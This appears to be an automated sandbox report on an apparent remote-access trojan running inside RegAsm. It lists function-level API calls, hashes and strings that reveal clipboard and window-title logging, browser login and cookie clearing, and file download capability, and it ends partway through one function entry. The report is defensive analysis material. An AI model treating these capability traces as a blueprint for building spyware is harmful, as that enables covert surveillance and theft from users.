                          • Opcode Fuzzy Hash: 423e02715d989b220add50ecbde53982322c6e48bca96a6cd7fe69295545b5c8
                          • Instruction Fuzzy Hash: 70412AB1600704BFE724AF79CD41B5EBBE8EB88714F10462FF145DB281E3B999058798
                          Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                          • __freea.LIBCMT ref: 100087D5
                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          • API String ID: 2652629310-0
                          • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                          • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                          • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                          • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                          Function 0040C047 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • Cleared browsers logins and cookies., xrefs: 0040C130
                          • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep
                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                          • API String ID: 3472027048-1236744412
                          • Opcode ID: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                          • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                          • Opcode Fuzzy Hash: af2c2d963010d4b9fe0ed32b7540b86f028afa125e63126aea6004068ef018c7
                          • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                          Function 004194FF Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                          Download Yara Rule
                          APIs
                          • EnumDisplayMonitors.USER32(00000000,00000000,0041960A,00000000), ref: 00419530
                          • EnumDisplayDevicesW.USER32(?), ref: 00419560
                          • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004195D5
                          • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195F2
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DisplayEnum$Devices$Monitors
                          • String ID:
                          • API String ID: 1432082543-0
                          • Opcode ID: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                          • Instruction ID: 2d7c1ce958f8de7f9ce17d43b909e87ea7509c435c2805f0bc90a8abde121c81
                          • Opcode Fuzzy Hash: 307544a1efd678830df2dab17394228d9bd71c3d3133ae3f2bbfdbf915fafe35
                          • Instruction Fuzzy Hash: 232180721083146BD221DF26DC89EABBBECEBD1754F00053FF45AD3190EB749A49C66A
                          Function 00412716 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                          • Sleep.KERNEL32(00000BB8), ref: 004127B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenQuerySleepValue
                          • String ID: 8SG$`.|$exepath
                          • API String ID: 4119054056-2072530549
                          • Opcode ID: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                          • Instruction ID: 51bf296395b05d3efeb7b41814c334b1d8e13e95dfba71b8de44539041ec8c28
                          • Opcode Fuzzy Hash: 2623c7753db8338a8ecc8f8a9aff935ef8b7f52fc7af967014f204662f36537b
                          • Instruction Fuzzy Hash: 3521F4A1B003042BD604B6365D4AAAF724D8B80318F40897FBA56E72D3DFBC9D45826D
                          Function 10001CCA Relevance: 6.1, APIs: 4, Instructions: 84fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                          • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: File$CloseHandleReadSize
                          • String ID:
                          • API String ID: 3642004256-0
                          • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                          • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                          • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                          • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                          Function 0040A564 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041C5E2: GetForegroundWindow.USER32 ref: 0041C5F2
                            • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                            • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041C625
                          • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                          • Sleep.KERNEL32(00000064), ref: 0040A638
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$SleepText$ForegroundLength
                          • String ID: [ $ ]
                          • API String ID: 3309952895-93608704
                          • Opcode ID: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                          • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                          • Opcode Fuzzy Hash: e3c1de537be80067876ef70e6a789dfde08fa912f151d6d6ce86b7d0ea258fd3
                          • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                          Function 00443B52 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                          • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                          • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                          • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                          Function 0041C26E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                          Download Yara Rule
                          APIs
                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                          • CloseHandle.KERNEL32(00000000), ref: 0041C2C4
                          • CloseHandle.KERNEL32(00000000), ref: 0041C2CC
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleOpenProcess
                          • String ID:
                          • API String ID: 39102293-0
                          • Opcode ID: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                          • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                          • Opcode Fuzzy Hash: e1074fac5642d3b73ea46f905cbac139ffb473db2c7b30d838fbef5372722d9f
                          • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                          Function 004398E3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                            • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                          • _UnwindNestedFrames.LIBCMT ref: 00439911
                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                          • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                          • String ID:
                          • API String ID: 2633735394-0
                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                          • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                          • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                          Function 0041941E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                          • GetSystemMetrics.USER32(0000004C,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041942B
                          • GetSystemMetrics.USER32(0000004D,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419431
                          • GetSystemMetrics.USER32(0000004E,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 00419437
                          • GetSystemMetrics.USER32(0000004F,?,?,?,?,00000000,004194DE,00000000,00000000), ref: 0041943D
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: MetricsSystem
                          • String ID:
                          • API String ID: 4116985748-0
                          • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                          • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                          • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                          • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                          Function 00438FB1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                          Download Yara Rule
                          APIs
                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                            • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                          • String ID:
                          • API String ID: 1761009282-0
                          • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                          • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                          • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                          • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                          Function 00442CAD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                          Download Yara Rule
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          • API String ID: 3213639722-2276729525
                          • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                          • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                          • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                          • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                          Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 1000655C
                            • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                            • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                            • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                          • String ID: *?$.
                          • API String ID: 2667617558-3972193922
                          • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                          • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                          • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                          • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                          Function 0040B783 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                          • __Init_thread_footer.LIBCMT ref: 0040B7D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Init_thread_footer__onexit
                          • String ID: [End of clipboard]$[Text copied to clipboard]
                          • API String ID: 1881088180-3686566968
                          • Opcode ID: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                          • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                          • Opcode Fuzzy Hash: 0ad70d16419787131355c48921a2e9415c0e2ce86788bdce81e29916b0442688
                          • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                          Function 00451BB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ACP$OCP
                          • API String ID: 0-711371036
                          • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                          • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                          • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                          • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                          Function 00418BCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                            • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                            • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                            • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                          • String ID: image/png
                          • API String ID: 1291196975-2966254431
                          • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                          • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                          • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                          • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                          Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                          Strings
                          • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalTime
                          • String ID: KeepAlive | Enabled | Timeout:
                          • API String ID: 481472006-1507639952
                          • Opcode ID: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                          • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                          • Opcode Fuzzy Hash: f2468334df4898d6ef002f637467a9298724a05ae75baec3b5dadd2c5d5b47a3
                          • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                          Function 00416676 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32 ref: 0041667B
                          • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DownloadFileSleep
                          • String ID: !D@
                          • API String ID: 1931167962-604454484
                          • Opcode ID: ee98af31ce45b4d0a512cb594eae40172249049edaa64c13d2d68bf68acbaca7
                          • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                          • Opcode Fuzzy Hash: ee98af31ce45b4d0a512cb594eae40172249049edaa64c13d2d68bf68acbaca7
                          • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                          Function 100016AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: : $Se.
                          • API String ID: 4218353326-4089948878
                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                          • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                          • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                          Function 0041B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: LocalTime
                          • String ID: | $%02i:%02i:%02i:%03i
                          • API String ID: 481472006-2430845779
                          • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                          • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                          • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                          • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                          Function 0041ADA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
